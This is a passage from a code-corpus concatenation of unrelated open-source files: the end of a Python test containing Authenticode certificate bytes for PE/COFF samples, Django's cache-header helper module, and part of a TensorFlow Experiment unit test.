Kd\xda\xc7\x1b[\xbd\xac9\x08\xd58"\xa13\x8b/\x8a\x9a\xeb\xbc\x07!?DA\t\x07\xb5e\x1c$\xbcH\xd3D\x80\xeb\xa1\xcf\xc9\x02\xb4\x14\xcfT\xc7\x16\xa3\x80\\\xf9y>]r}\x88\x17\x9e,C\xa2\xcaS\xce}=\xf6*:\xb8O\x94\x00\xa5m\n\x83]\xf9^S\xf4\x18\xb3W\x0fp\xc3\xfb\xf5\xad\x95\xa0\x0e\x17\xde\xc4\x16\x80`\xc9\x0f+n\x86\x04\xf1\xeb\xf4x\'\xd1\x05\xc5\xee4[^\xb9I2\xf230\x82\x03\xc40\x82\x03-\xa0\x03\x02\x01\x02\x02\x10G\xbf\x19\x95\xdf\x8dRFC\xf7\xdbmH\r1\xa40\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x000\x81\x8b1\x0b0\t\x06\x03U\x04\x06\x13\x02ZA1\x150\x13\x06\x03U\x04\x08\x13\x0cWestern Cape1\x140\x12\x06\x03U\x04\x07\x13\x0bDurbanville1\x0f0\r\x06\x03U\x04\n\x13\x06Thawte1\x1d0\x1b\x06\x03U\x04\x0b\x13\x14Thawte Certification1\x1f0\x1d\x06\x03U\x04\x03\x13\x16Thawte Timestamping CA0\x1e\x17\r031204000000Z\x17\r131203235959Z0S1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x170\x15\x06\x03U\x04\n\x13\x0eVeriSign, Inc.1+0)\x06\x03U\x04\x03\x13"VeriSign Time Stamping Services CA0\x82\x01"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\x00\xa9\xca\xb2\xa4\xcc\xcd \xaf\n}\x89\xac\x87u\xf0\xb4N\xf1\xdf\xc1\x0f\xbfga\xbd\xa3d\x1c\xda\xbb\xf9\xca3\xab\x840\x89X~\x8c\xdbk\xdd6\x9e\x0f\xbf\xd1\xecx\xf2w\xa6~o<\xbf\x93\xaf\r\xbah\xf4l\x94\xca\xbdR-\xabH=\xf5\xb6\xd5]_\x1b\x02\x9f\xfa/k\x1e\xa4\xf7\xa3\x9a\xa6\x1a\xc8\x02\xe1\x7fLR\xe3\x0e`\xec@\x1c~\xb9\r\xde?\xc7\xb4\xdf\x87\xbd_zj1.\x03\x99\x81\x13\xa8G \xce1s\rW-\xcdx43\x95\x12\x99\x12\xb9\xdeh/\xaa\xe6\xe3\xc2\x8a\x8c*\xc3\x8b!\x87f\xbd\x83XWou\xbf<\xaa&\x87]\xca\x10\x15<\x9f\x84\xeaT\xc1\nn\xc4\xfe\xc5J\xdd\xb9\x07\x11\x97"|\xdb>\'\xd1\x1ex\xec\x9f1\xc9\xf1\xe6"\x19\xdb\xc4\xb3GC\x9a\x1a_\xa0\x1e\x90\xe4^\xf5\xee|\xf1}\xabb\x01\x8f\xf5M\x0b\xde\xd0"V\xa8\x95\xcd\xae\x88v\xae\xee\xba\r\xf3\xe4M\xd9\xa0\xfbh\xa0\xae\x14;\xb3\x87\xc1\xbb\x02\x03\x01\x00\x01\xa3\x81\xdb0\x81\xd804\x06\x08+\x06\x01\x05\x05\x07\x01\x01\x04(0&0$\x06\x08+\x06\x01\x05\x05\x070\x01\x86\x18http://ocsp.verisign.com0\x12\x06\x03U\x1d\x13\x01\x01\xff\x04\x080\x06\x01\x01\xff\x02\x01\x000A\x06\x03U\x1d\x1f\x04:0806\xa04\xa02\x860http://crl.verisign.com/ThawteTimestampingCA.crl0\x13\x06\x03U\x1d%\x04\x0c0\n\x06\x08+\x06\x01\x05\x05\x07\x03\x080\x0e\x06\x03U\x1d\x0f\x01\x01\xff\x04\x04\x03\x02\x01\x060$\x06\x03U\x1d\x11\x04\x1d0\x1b\xa4\x190\x171\x150\x13\x06\x03U\x04\x03\x13\x0cTSA2048-1-530\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x00\x03\x81\x81\x00Jk\xf9\xeaX\xc2D\x1c1\x89y\x99+\x96\xbf\x82\xac\x01\xd6\x1cL\xcd\xb0\x8aXn\xdf\x08)\xa3^\xc8\xca\x93\x13\xe7\x04R\r\xefG\'/\x008\xb0\xe4\xc9\x93N\x9a\xd4"b\x15\xf7?7!Op1\x80\xf1\x8b8\x87\xb3\xe8\xe8\x97\x00\xfe\xcfU\x96N$\xd2\xa9\'Nz\xae\xb7aA\xf3*\xce\xe7\xc9\xd9^\xdd\xbb+\x85>\xb5\x9d\xb5\xd9\xe1W\xff\xbe\xb4\xc5~\xf5\xcf\x0c\x9e\xf0\x97\xfe+\xd3;R\x1b\x1b8\'\xf7?J0\x82\x04\xbf0\x82\x04(\xa0\x03\x02\x01\x02\x02\x10A\x91\xa1Z9x\xdf\xcfIef8\x1dLu\xc20\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x000_1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x170\x15\x06\x03U\x04\n\x13\x0eVeriSign, Inc.1705\x06\x03U\x04\x0b\x13.Class 3 Public Primary Certification Authority0\x1e\x17\r040716000000Z\x17\r140715235959Z0\x81\xb41\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x170\x15\x06\x03U\x04\n\x13\x0eVeriSign, Inc.1\x1f0\x1d\x06\x03U\x04\x0b\x13\x16VeriSign Trust Network1;09\x06\x03U\x04\x0b\x132Terms of use at https://www.verisign.com/rpa (c)041.0,\x06\x03U\x04\x03\x13%VeriSign Class 3 Code Signing 2004 CA0\x82\x01"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\x00\xbe\xbc\xee\xbc~\xef\x83\xeb\xe07O\xfb\x03\x108\xbe\x08\xd2\x8c}\x9d\xfa\x92\x7f\x19\x0c\xc2k\xeeBR\x8c\xde\xd3\x1cH\x13%\xea\xc1cz\xf9Qe\xee\xd3\xaa;\xf5\xf0\x94\x9c+\xfb\xf2f\xd4$\xda\xf7\xf5\x9fn\x1996\xbc\xd0\xa3v\x08\x1e"\'$l8\x91\'\xe2\x84I\xae\x1b\x8a\xa1\xfd%\x82,\x100\xe8q\xab(\xe8wJQ\xf1\xec\xcd\xf8\xf0T\xd4o\xc0\xe3m\n\x8f\xd9\xd8d\x8dc\xb2-N\'\xf6\x85\x0e\xfem\xe3)\x99\xe2\x85G|-\x86\x7f\xe8W\x8f\xadg\xc232\x91\x13 \xfc\xa9#\x14\x9am\xc2\x84Kvh\x04\xd5q,]!\xfa\x88\r&\xfd\x1f-\x91+\xe7\x01UM\xf2m5(\x82\xdf\xd9k\\\xb6\xd6\xd9\xaa\x81\xfd_\xcd\x83\xbac\x9d\xd0"\xfc\xa9;Bi\xb2\x8e:\xb5\xbc\xb4\x9e\x0f^\xc4\xea,\x82\x8b(\xfdS\x08\x96\xdd\xb5\x01 \xd1\xf9\xa5\x18\xe7\xc0\xeeQp7\xe1\xb6\x05HRHo8\xea\xc3\xe8l{D\x84\xbb\x02\x03\x01\x00\x01\xa3\x82\x01\xa00\x82\x01\x9c0\x12\x06\x03U\x1d\x13\x01\x01\xff\x04\x080\x06\x01\x01\xff\x02\x01\x000D\x06\x03U\x1d \x04=0;09\x06\x0b`\x86H\x01\x86\xf8E\x01\x07\x17\x030*0(\x06\x08+\x06\x01\x05\x05\x07\x02\x01\x16\x1chttps://www.verisign.com/rpa01\x06\x03U\x1d\x1f\x04*0(0&\xa0$\xa0"\x86 http://crl.verisign.com/pca3.crl0\x1d\x06\x03U\x1d%\x04\x160\x14\x06\x08+\x06\x01\x05\x05\x07\x03\x02\x06\x08+\x06\x01\x05\x05\x07\x03\x030\x0e\x06\x03U\x1d\x0f\x01\x01\xff\x04\x04\x03\x02\x01\x060\x11\x06\t`\x86H\x01\x86\xf8B\x01\x01\x04\x04\x03\x02\x00\x010)\x06\x03U\x1d\x11\x04"0 \xa4\x1e0\x1c1\x1a0\x18\x06\x03U\x04\x03\x13\x11Class3CA2048-1-430\x1d\x06\x03U\x1d\x0e\x04\x16\x04\x14\x08\xf5Q\xe8\xfb\xfe==d6|h\xcf[x\xa8\xdf\xb9\xc570\x81\x80\x06\x03U\x1d#\x04y0w\xa1c\xa4a0_1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x170\x15\x06\x03U\x04\n\x13\x0eVeriSign, Inc.1705\x06\x03U\x04\x0b\x13.Class 3 Public Primary Certification Authority\x82\x10p\xba\xe4\x1d\x10\xd9)4\xb68\xca{\x03\xcc\xba\xbf0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x00\x03\x81\x81\x00\xae:\x17\xb8J{U\xfadU\xec@\xa4\xedIA\x90\x99\x9c\x89\xbc\xaf.\x1d\xcax#\xf9\x1c\x19\x0f\x7f\xebh\xbc2\xd9\x888\xde\xdc?\xd3\x89\xb4?\xb1\x82\x96\xf1\xa4Z\xba\xed.&\xd3\xde|\x01n\x00\n\x00\xa4\x06\x92\x11H\t@\xf9\x1c\x18yg#$\xe0\xbb\xd5\xe1P\xae\x1b\xf5\x0e\xdd\xe0.\x81\xcd\x80\xa3lRO\x91uU\x8a\xba"\xf2\xd2\xeaAu\x88/cU}\x1eTZ\x95Y\xca\xd94\x81\xc0_^\xf6z\xb50\x82\x04\xdd0\x82\x03\xc5\xa0\x03\x02\x01\x02\x02\x10\t^ \xa8\x0bT\xa4]6\xf6\xc0k\x9b\x02\xf9:0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x000\x81\xb41\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x170\x15\x06\x03U\x04\n\x13\x0eVeriSign, Inc.1\x1f0\x1d\x06\x03U\x04\x0b\x13\x16VeriSign Trust Network1;09\x06\x03U\x04\x0b\x132Terms of use at https://www.verisign.com/rpa (c)041.0,\x06\x03U\x04\x03\x13%VeriSign Class 3 Code Signing 2004 CA0\x1e\x17\r070627000000Z\x17\r090626235959Z0\x81\xa01\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13\nCalifornia1\x120\x10\x06\x03U\x04\x07\x13\tCupertino1\x130\x11\x06\x03U\x04\n\x14\nApple Inc.1>0<\x06\x03U\x04\x0b\x135Digital ID Class 3 - Microsoft Software Validation v21\x130\x11\x06\x03U\x04\x03\x14\nApple Inc.0\x81\x9f0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x81\x8d\x000\x81\x89\x02\x81\x81\x00\xc0\xcc\xa0\x8c\x1b\x94\x94\xe0\xd7c\xcej6M\xa6\\Z7\xd1\x93i\x05\xb1\xf2V\x00\x14\xb0)s4\xb5\x11T\x0c\xe3JI\xf5\xad\x07\xc0\x90\xb7\xc0?GF\xd8\xeb\'\'i\xd7#\x8c\xb8\xb04^"l\xb0\xff\x98^\x0c\x03,J\xa0x&98!\x91\'1\xc0\x9b\xb7\xe6\xfa\x84G\xd0L(%\xd1\x075E\xbb\xa8\xf0\xa60\xdb\xf1\xd6\x8b\xfa\xc8\xa2\x87\xc3f\xfa\x90\xc5W\xccD\x01\xbd\xac\xe2V\xa6\xbaG\xf9E\x9cP\xcf\x02\x03\x01\x00\x01\xa3\x82\x01\x7f0\x82\x01{0\t\x06\x03U\x1d\x13\x04\x020\x000\x0e\x06\x03U\x1d\x0f\x01\x01\xff\x04\x04\x03\x02\x07\x800@\x06\x03U\x1d\x1f\x0490705\xa03\xa01\x86/http://CSC3-2004-crl.verisign.com/CSC3-2004.crl0D\x06\x03U\x1d \x04=0;09\x06\x0b`\x86H\x01\x86\xf8E\x01\x07\x17\x030*0(\x06\x08+\x06\x01\x05\x05\x07\x02\x01\x16\x1chttps://www.verisign.com/rpa0\x13\x06\x03U\x1d%\x04\x0c0\n\x06\x08+\x06\x01\x05\x05\x07\x03\x030u\x06\x08+\x06\x01\x05\x05\x07\x01\x01\x04i0g0$\x06\x08+\x06\x01\x05\x05\x070\x01\x86\x18http://ocsp.verisign.com0?\x06\x08+\x06\x01\x05\x05\x070\x02\x863http://CSC3-2004-aia.verisign.com/CSC3-2004-aia.cer0\x1f\x06\x03U\x1d#\x04\x180\x16\x80\x14\x08\xf5Q\xe8\xfb\xfe==d6|h\xcf[x\xa8\xdf\xb9\xc570\x11\x06\t`\x86H\x01\x86\xf8B\x01\x01\x04\x04\x03\x02\x04\x100\x16\x06\n+\x06\x01\x04\x01\x827\x02\x01\x1b\x04\x080\x06\x01\x01\x00\x01\x01\xff0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x00\x03\x82\x01\x01\x00\x88\xd9Hf\r\xd5\xfa\x0f6\xfd\x87\t\xe2[\xda\x1e\x9c\xb9\xdcs\xbdbM\x1f\x84[\xa1\x88\xf2A\x06\xa1\xe0\xed\x14N\xc4\xa23q>\x9d\x87|\xfc\x0c\xf2\x91\x18\x8d\xb4\x1d\x07x%\xa9\x82\x8aX\xef\xc2?g\x89\xfc\x0f\xaa\x0fMB\xb3o\xbb\xef\x1c\xde\xaf&\xdc\xd6\xad\xf7\xcc\xe7\xce\xbfK<\x02>5\xf7\xef\x14\x8f\xb8\x06"\x95~\xc3,\xa4%\n\xd0\xd8\x01:\x83\x1e\xc1\x87)\xfe]\xc1\rW\xa6G\xde,\xfe*x\x1f\xc6\x99\xa1r\xe8\xd3\xadL\x93\xd6~U\xa8Q\x05\x99\x8aP\x16\xedY]m@\x04\xb9R\xf3\xaa\x8cZme\x96\x0f\x08\xcc\xb8\x15:n#\xbdAz\xb6\xf1K#\x05-\x17<9\n\x8a!@\xe6on&\xab\xed\x91\xcf\x96\xf5\xe8[k\xea\xf2\xde_\x92\n\xce\x1e\xbf\xb5\xb5*\xd5\xac\xdfv\xb9\xc9\xd6\xbe\xca\x15\x8e\xab5;\x98\xea/\x8e\xdc\x084zef\x11V0\xd1\xeb"\x98\x10\x8c\xe34\x93\xda\x10\x90\x18\xf5a8CI\x181\x82\x03\xb20\x82\x03\xae\x02\x01\x010\x81\xc90\x81\xb41\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x170\x15\x06\x03U\x04\n\x13\x0eVeriSign, Inc.1\x1f0\x1d\x06\x03U\x04\x0b\x13\x16VeriSign Trust Network1;09\x06\x03U\x04\x0b\x132Terms of use at https://www.verisign.com/rpa (c)041.0,\x06\x03U\x04\x03\x13%VeriSign Class 3 Code Signing 2004 CA\x02\x10\t^ \xa8\x0bT\xa4]6\xf6\xc0k\x9b\x02\xf9:0\x0c\x06\x08*\x86H\x86\xf7\r\x02\x05\x05\x00\xa0\x81\xba0\x19\x06\t*\x86H\x86\xf7\r\x01\t\x031\x0c\x06\n+\x06\x01\x04\x01\x827\x02\x01\x040\x1c\x06\n+\x06\x01\x04\x01\x827\x02\x01\x0b1\x0e0\x0c\x06\n+\x06\x01\x04\x01\x827\x02\x01\x150\x1f\x06\t*\x86H\x86\xf7\r\x01\t\x041\x12\x04\x10\x85\x90\xd4\xd2\xd3{w\xde\xf3[\xe7E\x88w\xc7+0^\x06\n+\x06\x01\x04\x01\x827\x02\x01\x0c1P0N\xa0,\x80*\x00A\x00p\x00p\x00l\x00e\x00 \x00S\x00o\x00f\x00t\x00w\x00a\x00r\x00e\x00 \x00U\x00p\x00d\x00a\x00t\x00e\xa1\x1e\x80\x1chttp://www.apple.com/macosx 0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x04\x81\x80\x9d\x80\xe8L\xe3P\xae\x81\xbb{\xa5\xe6\x14\xf3\xc6f\x8e\x80\xde\xfa\xceM^\xea\xf7\xad[n\xedFx>;o\x85\x0f\xba:\xd9\xbfA\xf5b\xc02\x96o\xdbBe\xd7\x84f\xbb\xb2\xccJj$\x01\xa0=\xf0\x03f\xdd\x0b\xdb\x8cY\xda\xb3-\x89\xe3\x7f\xfd\x1d\x97\xe3\xab\x15\\b\xc1\xcd\x0f\xdd9\xab\xa4r0\xdd <\x8b=\xf1\xe1\xb8+\xbc<\xf5C\xf7\xf2\xef\x9a5\xcd\xca\xd0\x85R\xca~\xe4F2\xe9KN\x03\n\xcb\xc0\xa1\x82\x01~0\x82\x01z\x06\t*\x86H\x86\xf7\r\x01\t\x061\x82\x01k0\x82\x01g\x02\x01\x010g0S1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x170\x15\x06\x03U\x04\n\x13\x0eVeriSign, Inc.1+0)\x06\x03U\x04\x03\x13"VeriSign Time Stamping Services CA\x02\x108%\xd7\xfa\xf8a\xaf\x9e\xf4\x90\xe7&\xb5\xd6Z\xd50\x0c\x06\x08*\x86H\x86\xf7\r\x02\x05\x05\x00\xa0Y0\x18\x06\t*\x86H\x86\xf7\r\x01\t\x031\x0b\x06\t*\x86H\x86\xf7\r\x01\x07\x010\x1c\x06\t*\x86H\x86\xf7\r\x01\t\x051\x0f\x17\r080725222153Z0\x1f\x06\t*\x86H\x86\xf7\r\x01\t\x041\x12\x04\x10\xcc\xfeN\xc7\xf2\xca\x9e[\xfdH\xa69\xb4m\x03\xb40\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x04\x81\x80\x89\xc0\xf3\xc9\xfc\xe5R]3\xe5\x88E\xf3M}+\xc7\xcc\xe7\x87[\xc6\x99\xb6\xb8\x11\x8a\xf0\xbb:\x9c\x90\xc5\x1c\x0f\xfe\x1d.\xf8D\x87\x887\x12\x8f$%\xd7Lx\x15*\t\xf5\xb7\xa2~\xb0\x8d"y\xa1^\xc5\xd0\x91\xf72\x9cj\xa6\xb7\x809p\xce\xb9\x14\x9b\x87\xa8\xc5C\x14^\x88\xc2\x93Yw\xe9b\x86\x98\x95\x83r\xda\x19*NlIg\x1cX\xf1\xbf"\x83\x9d\xcc\xd2\x1d=\xe8\xb5M\xc2SW\xe7|T\xf4{\xc5\xc9\x00',
)],
'sha1':
b'\x97\x8b\x90\xac\xe9\x9cvHA\xd2\xdd\x17\xd2x\xfa\xc4\x14\x99b\xa3',
'name':
'pecoff',
'md5':
b'\xe0(n\x9az\x8d\xf0\xd5\xd9\xea\x88m\xea\x8e\xe6\x00'
}]
SAMPLE_LIST = {
'pciide.sys': SAMPLE_DATA_1,
'simple': SAMPLE_DATA_2,
'SoftwareUpdate.exe': SAMPLE_DATA_3,
}
# pyformat: enable
if __name__ == '__main__':
absltest.main()
|
mzdaniel/oh-mainline
|
refs/heads/master
|
vendor/packages/Django/django/utils/cache.py
|
55
|
"""
This module contains helper functions for controlling caching. It does so by
managing the "Vary" header of responses. It includes functions to patch the
header of response objects directly and decorators that change functions to do
that header-patching themselves.
For information on the Vary header, see:
http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.44
Essentially, the "Vary" HTTP header defines which headers a cache should take
into account when building its cache key. Requests with the same path but
different header content for headers named in "Vary" need to get different
cache keys to prevent delivery of wrong content.
An example: i18n middleware would need to distinguish caches by the
"Accept-language" header.
"""
import re
import time
from django.conf import settings
from django.core.cache import get_cache
from django.utils.encoding import smart_str, iri_to_uri
from django.utils.http import http_date
from django.utils.hashcompat import md5_constructor
from django.utils.translation import get_language
from django.http import HttpRequest
cc_delim_re = re.compile(r'\s*,\s*')
def patch_cache_control(response, **kwargs):
"""
This function patches the Cache-Control header by adding all
keyword arguments to it. The transformation is as follows:
* All keyword parameter names are turned to lowercase, and underscores
are converted to hyphens.
* If the value of a parameter is True (exactly True, not just a
true value), only the parameter name is added to the header.
* All other parameters are added with their value, after applying
str() to it.
"""
def dictitem(s):
t = s.split('=', 1)
if len(t) > 1:
return (t[0].lower(), t[1])
else:
return (t[0].lower(), True)
def dictvalue(t):
if t[1] is True:
return t[0]
else:
return t[0] + '=' + smart_str(t[1])
if response.has_header('Cache-Control'):
cc = cc_delim_re.split(response['Cache-Control'])
cc = dict([dictitem(el) for el in cc])
else:
cc = {}
# If there's already a max-age header but we're being asked to set a new
# max-age, use the minimum of the two ages. In practice this happens when
# a decorator and a piece of middleware both operate on a given view.
if 'max-age' in cc and 'max_age' in kwargs:
kwargs['max_age'] = min(cc['max-age'], kwargs['max_age'])
# Allow overriding private caching and vice versa
if 'private' in cc and 'public' in kwargs:
del cc['private']
elif 'public' in cc and 'private' in kwargs:
del cc['public']
for (k, v) in kwargs.items():
cc[k.replace('_', '-')] = v
cc = ', '.join([dictvalue(el) for el in cc.items()])
response['Cache-Control'] = cc
def get_max_age(response):
"""
Returns the max-age from the response Cache-Control header as an integer
(or ``None`` if it wasn't found or wasn't an integer.
"""
if not response.has_header('Cache-Control'):
return
cc = dict([_to_tuple(el) for el in
cc_delim_re.split(response['Cache-Control'])])
if 'max-age' in cc:
try:
return int(cc['max-age'])
except (ValueError, TypeError):
pass
def patch_response_headers(response, cache_timeout=None):
"""
Adds some useful headers to the given HttpResponse object:
ETag, Last-Modified, Expires and Cache-Control
Each header is only added if it isn't already set.
cache_timeout is in seconds. The CACHE_MIDDLEWARE_SECONDS setting is used
by default.
"""
if cache_timeout is None:
cache_timeout = settings.CACHE_MIDDLEWARE_SECONDS
if cache_timeout < 0:
cache_timeout = 0 # Can't have max-age negative
if settings.USE_ETAGS and not response.has_header('ETag'):
response['ETag'] = '"%s"' % md5_constructor(response.content).hexdigest()
if not response.has_header('Last-Modified'):
response['Last-Modified'] = http_date()
if not response.has_header('Expires'):
response['Expires'] = http_date(time.time() + cache_timeout)
patch_cache_control(response, max_age=cache_timeout)
def add_never_cache_headers(response):
"""
Adds headers to a response to indicate that a page should never be cached.
"""
patch_response_headers(response, cache_timeout=-1)
def patch_vary_headers(response, newheaders):
"""
Adds (or updates) the "Vary" header in the given HttpResponse object.
newheaders is a list of header names that should be in "Vary". Existing
headers in "Vary" aren't removed.
"""
# Note that we need to keep the original order intact, because cache
# implementations may rely on the order of the Vary contents in, say,
# computing an MD5 hash.
if response.has_header('Vary'):
vary_headers = cc_delim_re.split(response['Vary'])
else:
vary_headers = []
# Use .lower() here so we treat headers as case-insensitive.
existing_headers = set([header.lower() for header in vary_headers])
additional_headers = [newheader for newheader in newheaders
if newheader.lower() not in existing_headers]
response['Vary'] = ', '.join(vary_headers + additional_headers)
def has_vary_header(response, header_query):
"""
Checks to see if the response has a given header name in its Vary header.
"""
if not response.has_header('Vary'):
return False
vary_headers = cc_delim_re.split(response['Vary'])
existing_headers = set([header.lower() for header in vary_headers])
return header_query.lower() in existing_headers
def _i18n_cache_key_suffix(request, cache_key):
"""If enabled, returns the cache key ending with a locale."""
if settings.USE_I18N:
# first check if LocaleMiddleware or another middleware added
# LANGUAGE_CODE to request, then fall back to the active language
# which in turn can also fall back to settings.LANGUAGE_CODE
cache_key += '.%s' % getattr(request, 'LANGUAGE_CODE', get_language())
return cache_key
def _generate_cache_key(request, method, headerlist, key_prefix):
"""Returns a cache key from the headers given in the header list."""
ctx = md5_constructor()
for header in headerlist:
value = request.META.get(header, None)
if value is not None:
ctx.update(value)
path = md5_constructor(iri_to_uri(request.get_full_path()))
cache_key = 'views.decorators.cache.cache_page.%s.%s.%s.%s' % (
key_prefix, request.method, path.hexdigest(), ctx.hexdigest())
return _i18n_cache_key_suffix(request, cache_key)
def _generate_cache_header_key(key_prefix, request):
"""Returns a cache key for the header cache."""
path = md5_constructor(iri_to_uri(request.get_full_path()))
cache_key = 'views.decorators.cache.cache_header.%s.%s' % (
key_prefix, path.hexdigest())
return _i18n_cache_key_suffix(request, cache_key)
def get_cache_key(request, key_prefix=None, method='GET', cache=None):
"""
Returns a cache key based on the request path and query. It can be used
in the request phase because it pulls the list of headers to take into
account from the global path registry and uses those to build a cache key
to check against.
If there is no headerlist stored, the page needs to be rebuilt, so this
function returns None.
"""
if key_prefix is None:
key_prefix = settings.CACHE_MIDDLEWARE_KEY_PREFIX
cache_key = _generate_cache_header_key(key_prefix, request)
if cache is None:
cache = get_cache(settings.CACHE_MIDDLEWARE_ALIAS)
headerlist = cache.get(cache_key, None)
if headerlist is not None:
return _generate_cache_key(request, method, headerlist, key_prefix)
else:
return None
def learn_cache_key(request, response, cache_timeout=None, key_prefix=None, cache=None):
"""
Learns what headers to take into account for some request path from the
response object. It stores those headers in a global path registry so that
later access to that path will know what headers to take into account
without building the response object itself. The headers are named in the
Vary header of the response, but we want to prevent response generation.
The list of headers to use for cache key generation is stored in the same
cache as the pages themselves. If the cache ages some data out of the
cache, this just means that we have to build the response once to get at
the Vary header and so at the list of headers to use for the cache key.
"""
if key_prefix is None:
key_prefix = settings.CACHE_MIDDLEWARE_KEY_PREFIX
if cache_timeout is None:
cache_timeout = settings.CACHE_MIDDLEWARE_SECONDS
cache_key = _generate_cache_header_key(key_prefix, request)
if cache is None:
cache = get_cache(settings.CACHE_MIDDLEWARE_ALIAS)
if response.has_header('Vary'):
headerlist = ['HTTP_'+header.upper().replace('-', '_')
for header in cc_delim_re.split(response['Vary'])]
cache.set(cache_key, headerlist, cache_timeout)
return _generate_cache_key(request, request.method, headerlist, key_prefix)
else:
# if there is no Vary header, we still need a cache key
# for the request.get_full_path()
cache.set(cache_key, [], cache_timeout)
return _generate_cache_key(request, request.method, [], key_prefix)
def _to_tuple(s):
t = s.split('=',1)
if len(t) == 2:
return t[0].lower(), t[1]
return t[0].lower(), True
|
wweiradio/django
|
refs/heads/master
|
tests/foreign_object/__init__.py
|
12133432
| |
moritzpein/mong
|
refs/heads/master
|
mong/__init__.py
|
12133432
| |
JT5D/scikit-learn
|
refs/heads/master
|
sklearn/semi_supervised/tests/__init__.py
|
12133432
| |
joao-bjsoftware/django-avatar
|
refs/heads/master
|
avatar/management/commands/__init__.py
|
12133432
| |
jeffzheng1/tensorflow
|
refs/heads/master
|
tensorflow/contrib/learn/python/learn/experiment_test.py
|
16
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for TaskRunner and Experiment class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import tensorflow as tf
from tensorflow.contrib.learn.python.learn import run_config
from tensorflow.python.util.all_util import reveal_undocumented
class TestEstimator(tf.contrib.learn.Evaluable, tf.contrib.learn.Trainable):
def __init__(self, config=None):
self.eval_count = 0
self.fit_count = 0
self.monitors = []
self._config = config or run_config.RunConfig()
@property
def config(self):
return self._config
def evaluate(self, **kwargs):
tf.logging.info('evaluate called with args: %s' % kwargs)
self.eval_count += 1
if self.eval_count > 5:
tf.logging.info('Ran 6 evals. Done.')
raise StopIteration()
return [(key, kwargs[key]) for key in sorted(kwargs.keys())]
def fit(self, **kwargs):
tf.logging.info('fit called with args: %s' % kwargs)
self.fit_count += 1
if 'monitors' in kwargs:
self.monitors = kwargs['monitors']
return [(key, kwargs[key]) for key in sorted(kwargs.keys())]
class ExperimentTest(tf.test.TestCase):
def setUp(self):
# The official name is tf.train, so tf.training was obliterated.
reveal_undocumented('tensorflow.python.training')
def test_train(self):
est = TestEstimator()
ex = tf.contrib.learn.Experiment(est,
train_input_fn='train_input',
train_steps='train_steps',
eval_input_fn='eval_input',
eval_metrics='eval_metrics')
fit_args = ex.train(delay_secs=0)
self.assertEquals(1, est.fit_count)
self.assertIn(('max_steps', 'train_steps'), fit_args)
self.assertEquals(0, est.eval_count)
def test_train_delay(self):
est = TestEstimator()
ex = tf.contrib.learn.Experiment(est,
train_input_fn='train_input',
eval_input_fn='eval_input')
for delay in [0, 1, 3]:
start = time.time()
ex.train(delay_secs=delay)
duration = time.time() - start
self.assertAlmostEqual(duration, delay, delta=0.5)
def test_train_default_delay(self):
config = run_config.RunConfig()
est = TestEstimator(config)
ex = tf.contrib.learn.Experiment(est,
train_input_fn='train_input',
eval_input_fn='eval_input')
for task in [0, 1, 3]:
start = time.time()
config.task = task
ex.train()
duration = time.time() - start
self.assertAlmostEqual(duration, task*5, delta=0.5)
@tf.test.mock.patch('tensorflow.python.training.server_lib.Server') # pylint: disable=line-too-long
def test_train_starts_server(self, mock_server):
# Arrange.
config = tf.contrib.learn.RunConfig(
master='host4:2222',
cluster_spec=tf.train.ClusterSpec(
{'ps': ['host1:2222', 'host2:2222'],
'worker': ['host3:2222', 'host4:2222', 'host5:2222']}
),
job_name='worker',
task=1,
num_cores=15,
gpu_memory_fraction=0.314,
)
est = TestEstimator(config)
ex = tf.contrib.learn.Experiment(est,
train_input_fn='train_input',
eval_input_fn='eval_input')
# Act.
# We want to make sure we discount the time it takes to start the server
# in our accounting of the delay, so we set a small delay here.
start = time.time()
ex.train(delay_secs=1)
duration = time.time() - start
# Assert.
expected_config_proto = tf.ConfigProto()
expected_config_proto.inter_op_parallelism_threads = 15
expected_config_proto.intra_op_parallelism_threads = 15
expected_config_proto.gpu_options.per_process_gpu_memory_fraction = 0.314
mock_server.assert_called_with(
config.cluster_spec,
job_name='worker',
task_index=1,
config=expected_config_proto,
start=False)
mock_server.assert_has_calls([tf.test.mock.call().start()])
# Ensure that the delay takes into account the time to start the server.
self.assertAlmostEqual(duration, 1.0, delta=0.5)
@tf.test.mock.patch('tensorflow.python.training.server_lib.Server') # pylint: disable=line-too-long
def test_train_server_does_not_start_without_cluster_spec(self, mock_server):
config = tf.contrib.learn.RunConfig(master='host4:2222')
ex = tf.contrib.learn.Experiment(TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
# The server should not have started because there was no ClusterSpec.
self.assertFalse(mock_server.called)
@tf.test.mock.patch('tensorflow.python.training.server_lib.Server') # pylint: disable=line-too-long
